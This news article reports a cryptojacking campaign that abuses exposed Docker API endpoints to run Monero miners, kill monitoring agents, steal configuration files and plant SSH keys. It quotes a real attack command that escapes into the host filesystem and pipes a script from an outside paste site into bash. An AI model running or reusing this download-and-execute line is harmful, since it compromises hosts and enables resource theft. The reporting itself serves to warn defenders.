Cybersecurity firm Bad Packets LLC has found a group of hackers is actively scanning the internet for Docker accounts with exposed application programming interface endpoints (API) and use them for mining of the cryptocurrency Monero.
The hacker group is currently scanning more than 59,000 IP networks for API vulnerability.
Monero is a privacy coin, which means that it has enhanced features to protect the privacy of users carrying out transactions. The identities of senders and receivers, as well as the value of the transactions, are obscured before being embedded on the blockchain. It is different from Bitcoin, where everyone on the network can see every transaction as well as public keys of persons carrying out the transaction. Unfortunately, the enhanced privacy features are attracting hackers whose identities are protected due to the privacy features of the network.
Troy Mursch, chief research officer and co-founder of Bad Packets, said,
“This isn’t your average script kiddie exploit attempt. There was a moderate level of effort put into this campaign.”
The hackers use exposed API endpoint to start an Alpine Linux OS container which runs the following command:
chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;
The command will download and run a Bash script, which will install an XMRRig cryptocurrency miner for mining Monero.
The attack began two days ago, and hackers mined 14.82 Monero (XMR) worth about $740 at this time.
The malware installed in host with exposed APIs also uninstalls known monitoring agents and kills several processes. Thus, it eliminates processes and features which can potentially be used to eliminate it.
It also attacks the host’s rConfig configuration files. It encrypts the files and sends them to the hacker’s server.
Another cybersecurity firm Sandfly Security has found that the hackers have installed SSH keys in the infected hosts to allow them to control the hosts from a remote location.
In March this year, runC vulnerability was used to install Monero mining software in exposed Docker hosts.
Last month a worm called “Gradoid” affected more than 2,000 exposed Docker hosts.
Bad Packet’s Mursch has asked users of Docker to check whether their API endpoints are visible on the internet. If they are, the users should immediately close them.